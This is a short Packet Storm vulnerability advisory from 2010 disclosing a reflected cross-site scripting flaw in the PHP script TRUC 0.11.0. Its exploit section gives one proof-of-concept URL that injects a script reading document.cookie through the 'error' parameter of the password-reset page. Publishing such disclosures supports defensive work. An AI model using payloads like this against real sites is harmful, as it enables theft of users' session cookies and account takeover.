TRUC 0.11.0 Cross Site Scripting

2010-02-28T00:00:00
ID PACKETSTORM:86765
Type packetstorm
Reporter Snakespc
Modified 2010-02-28T00:00:00

Description

                                        
                                            `==============================================================================  
[»] TRUC 0.11.0 XSS Vulnerability   
==============================================================================  
  
[»] Script: [TRUC 0.11.0]  
[»] Language: [ PHP ]  
[»] Download: http://sec-war.com/up//uploads/files/domain-2c57be85d5.rar  
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]  
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]  
  
###########################################################################  
===[ Exploit ]===  
  
[»]http://localhost/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script>  
[»]Author: Snakespc <-  
###########################################################################  
`